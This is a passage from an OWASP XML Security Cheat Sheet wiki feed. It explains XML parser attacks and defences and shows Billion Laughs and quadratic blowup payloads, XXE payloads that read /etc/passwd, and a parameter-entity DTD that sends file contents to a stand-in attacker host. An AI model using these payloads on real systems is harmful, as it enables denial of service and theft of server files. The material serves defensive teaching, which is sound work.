&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
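&lt;br /&gt;
The imbalance between what the attacker sends and what the parser must hold can be estimated with simple arithmetic. The following is a rough sketch in Python; the function name is hypothetical, and the estimate ignores the few bytes of surrounding markup:&lt;br /&gt;

```python
REFERENCE_LENGTH = 3  # an ampersand, the letter A, and a semicolon


def quadratic_blowup(entity_length, reference_count):
    """Return (approximate characters sent, characters after expansion)."""
    sent = entity_length + reference_count * REFERENCE_LENGTH
    expanded = entity_length * reference_count
    return sent, expanded


sent, expanded = quadratic_blowup(100_000, 100_000)
amplification = expanded // sent
```

With the figures used above, roughly 400,000 characters on the wire expand to 10,000,000,000 characters, an amplification factor of about 25,000.&lt;br /&gt;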
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the entities included within the following code, the application will start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt; entities it references; then each of these will be resolved as 10 &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; entities, and so on. Finally, the CPU and/or memory will be affected by expanding 10^9 (1,000,000,000) copies of the string &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, about 3*10^9 (3,000,000,000) characters, which could make the parser crash.&lt;br /&gt;
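&lt;br /&gt;
The growth is exponential in the number of nesting levels, which a short calculation makes explicit. The following is a minimal sketch in Python; the function name is hypothetical:&lt;br /&gt;

```python
def expanded_characters(base_text, fanout, levels):
    """Length of the text produced by fully expanding the last entity.

    base_text is the innermost replacement text, fanout is the number of
    references each entity makes to the previous one, and levels is the
    number of entities stacked on top of the innermost one.
    """
    return len(base_text) * fanout ** levels


copies = 10 ** 9                                # LOL9 yields 10^9 copies of LOL
total = expanded_characters("LOL", 10, 9)       # three characters per copy
```

Each additional level multiplies the result by ten, so a document of under a kilobyte describes about three billion characters of expanded text.&lt;br /&gt;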
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
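&lt;br /&gt;
Rejecting any message that contains a DTD can be approximated at the parser level. The following is a minimal sketch in Python, assuming the standard &amp;lt;tt&amp;gt;xml.parsers.expat&amp;lt;/tt&amp;gt; module; the exception class and function name are hypothetical, and a real SOAP stack may expose its own switch for this:&lt;br /&gt;

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when a document carries a DOCTYPE declaration."""


def parse_without_dtd(xml_bytes):
    """Parse xml_bytes with expat, failing as soon as a DOCTYPE appears."""

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        # Called by expat at the start of the DOCTYPE, before any entity
        # declaration inside it has been processed.
        raise DoctypeForbidden("DOCTYPE declarations are not accepted")

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = reject_doctype
    parser.Parse(xml_bytes, True)
```

Because the handler fires before the entity declarations are read, a document such as the one above would be refused without any expansion taking place.&lt;br /&gt;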
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, whose value is the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt; and which will be expanded within the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; element. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes the server retrieve remote resources, such as a file available via HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, to perform port scanning, and to perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario. With complete disclosure, you can clearly see what is going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports, depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the response time when connecting to an open port will be very quick (one second, for example). The difference between open and closed ports becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host, then analyze the average time for each port to determine its status. This type of attack will be difficult to accomplish in higher-latency networks.&lt;br /&gt;
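&lt;br /&gt;
The averaging step described above can be illustrated on timing data that has already been collected. The following is a minimal sketch in Python, assuming the standard &amp;lt;tt&amp;gt;statistics&amp;lt;/tt&amp;gt; module; the function name and the shape of the input (a mapping from port number to a list of response times in seconds) are assumptions made for this example:&lt;br /&gt;

```python
import statistics


def rank_ports_by_mean_time(samples_by_port):
    """Return (port, mean seconds) pairs ordered from fastest to slowest."""
    means = {
        port: statistics.mean(times)
        for port, times in samples_by_port.items()
    }
    # Sorting by the mean groups ports with similar behaviour together, so a
    # gap between two clusters hints at the open/closed boundary.
    return sorted(means.items(), key=lambda pair: pair[1])
```

How large a gap counts as significant depends on the network, which is why high latency and jitter make this classification unreliable.&lt;br /&gt;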
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; in the user information part of the URI. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
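&lt;br /&gt;
A defensive counterpart is to refuse system identifiers that carry credentials. The following is a minimal sketch in Python, assuming the standard &amp;lt;tt&amp;gt;urllib.parse&amp;lt;/tt&amp;gt; module; the function name is hypothetical:&lt;br /&gt;

```python
from urllib.parse import urlsplit


def has_embedded_credentials(uri):
    """Return True when the URI carries a username or password."""
    parts = urlsplit(uri)
    # urlsplit exposes the text before the at sign of the authority
    # component as the username and password attributes.
    return parts.username is not None or parts.password is not None
```

The URI shown above would be flagged, while a plain reference such as &amp;lt;tt&amp;gt;http://example.com/note.dtd&amp;lt;/tt&amp;gt; would not.&lt;br /&gt;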
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224422</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224422"/>
				<updated>2016-12-21T20:08:37Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using documents that are not well formed.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
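&lt;br /&gt;
The comparison described above can be scripted. The following is a minimal sketch in Python, assuming the standard &amp;lt;tt&amp;gt;xml.etree.ElementTree&amp;lt;/tt&amp;gt; parser stands in for the parser under test; the function name and the repetition count are hypothetical:&lt;br /&gt;

```python
import time
import xml.etree.ElementTree as ET


def parse_seconds(xml_bytes, repetitions=100):
    """Return the total seconds spent parsing xml_bytes repeatedly."""
    start = time.perf_counter()
    for _ in range(repetitions):
        try:
            ET.fromstring(xml_bytes)
        except ET.ParseError:
            # Malformed input: the time spent before the error still counts.
            pass
    return time.perf_counter() - start
```

Calling the function once with a regular document and once with its malformed version gives two figures to compare; a markedly larger figure for the malformed version would suggest the asymmetry discussed above.&lt;br /&gt;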
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though it is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up, and eventually deplete, the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
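One way to limit this kind of attack is to stop parsing as soon as the nesting passes a fixed depth. The following is a minimal sketch in Python using the standard &amp;lt;tt&amp;gt;xml.parsers.expat&amp;lt;/tt&amp;gt; module; the names &amp;lt;tt&amp;gt;check_depth&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;DepthLimitExceeded&amp;lt;/tt&amp;gt; and the default limit of 100 are assumptions made for illustration, not values taken from any specification:&lt;br /&gt;
&lt;br /&gt;
```python
import xml.parsers.expat


class DepthLimitExceeded(Exception):
    """Raised when a document nests elements deeper than allowed."""


def check_depth(data, max_depth=100):
    """Parse data (str or bytes) and return the deepest nesting level seen.

    Raises DepthLimitExceeded as soon as max_depth is passed, so the
    rest of the document is never processed. The limit is an assumed value.
    """
    state = {"depth": 0, "deepest": 0}

    def start(name, attrs):
        # Called by expat for every opening tag.
        state["depth"] += 1
        if state["depth"] > max_depth:
            raise DepthLimitExceeded(name)
        state["deepest"] = max(state["deepest"], state["depth"])

    def end(name):
        # Called by expat for every closing tag.
        state["depth"] -= 1

    parser = xml.parsers.expat.ParserCreate()
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.Parse(data, True)
    return state["deepest"]
```
&lt;br /&gt;
Because the check runs inside the start-tag handler, a document made only of opening tags is rejected at the first tag past the limit instead of after the whole input has been read.&lt;br /&gt;
&lt;br /&gt;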
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
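The integrity check recommended above can be sketched as a comparison between the SHA-256 digest of the local schema file and a known good digest obtained through a trusted channel. This is only an illustration in Python; the function name &amp;lt;tt&amp;gt;schema_matches&amp;lt;/tt&amp;gt; and the choice of SHA-256 are assumptions:&lt;br /&gt;
&lt;br /&gt;
```python
import hashlib
import hmac


def schema_matches(path, expected_sha256):
    """Return True if the file at path has the expected SHA-256 hex digest."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        # Read in chunks so that large schema files are not loaded at once.
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    # compare_digest avoids leaking where the two strings differ.
    return hmac.compare_digest(digest.hexdigest(), expected_sha256.lower())
```
&lt;br /&gt;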
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
